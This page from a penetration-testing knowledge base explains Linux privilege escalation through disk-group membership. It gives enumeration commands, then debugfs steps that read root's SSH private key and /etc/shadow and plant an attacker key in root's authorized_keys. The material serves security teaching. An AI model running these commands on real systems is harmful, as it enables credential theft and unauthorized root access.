Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 03. Linux / 02. Privilege Escalation / Groups / DISK Group

DISK Group

Members of the disk group are able to access raw block devices exposed under /dev.

This includes physical disks and disk partitions that back the operating system. By interacting directly with these devices, a user can bypass normal filesystem permissions and inspect or modify data regardless of its ownership.

When enumerating the disk group, try to identify:

  • Membership in the disk group
  • Accessible block devices
  • Operating system partitions
  • Sensitive files on mounted filesystems
  • SSH keys
  • Password hashes
  • Opportunities to modify the filesystem directly

Enumeration

Determine the current user's groups:

id

List available block devices:

lsblk

Display disk partitions:

sudo fdisk -l

Inspect available devices:

ls -lah /dev

Interesting findings include:

  • Membership in the disk group
  • The operating system partition (commonly /dev/sda1)
  • Additional mounted disks
  • Backup volumes
  • Recovery partitions

Once membership in the disk group has been identified, determine whether the operating system partition can be accessed directly using debugfs.

Exploit

  1. Verify membership in the disk group
  2. Identify the operating system partition
  3. Open the partition using debugfs
  4. Enumerate sensitive files
  5. Retrieve credentials or modify the filesystem
  6. Leverage the obtained access to achieve privilege escalation

Open the filesystem:

debugfs /dev/sda1

Read sensitive files:

cat /root/.ssh/id_rsa

cat /etc/shadow

Add an SSH public key to root's account:

write attacker.pub /root/.ssh/authorized_keys

Exit debugfs:

quit